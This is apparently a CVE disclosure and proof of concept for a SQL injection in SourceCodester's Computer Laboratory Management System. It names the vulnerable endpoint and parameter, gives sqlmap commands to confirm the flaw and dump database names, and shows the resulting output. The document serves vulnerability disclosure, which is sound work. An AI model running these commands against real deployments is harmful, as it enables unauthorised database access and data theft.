CVE-2024-6802

 

Details

Attack type: SQL injection

CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Vendor: SourceCodester

Product: Computer Laboratory Management System

Affected components: /lms/classes/Master.php?f=save_record

Injection parameter: MULTIPART id

 

POC

Intercept the request using Burpsuite Proxy.

Save the request to save_record.txt

The vulnerability can be verified with the following command:

sqlmap -r save_record.txt --batch

Parameter: MULTIPART id ((custom) POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: -----------------------------20097612161463129383887948722
Content-Disposition: form-data; name="id"


    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: -----------------------------20097612161463129383887948722
Content-Disposition: form-data; name="id"


    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: -----------------------------20097612161463129383887948722
Content-Disposition: form-data; name="id"

Databases can be dumped using the following command:

sqlmap -r save_record.txt --batch --dbs

[02:45:07] [INFO] fetching database names
[02:45:07] [INFO] retrieved: 'information_schema'
[02:45:07] [INFO] retrieved: 'lms'
available databases [2]:
[*] information_schema
[*] lms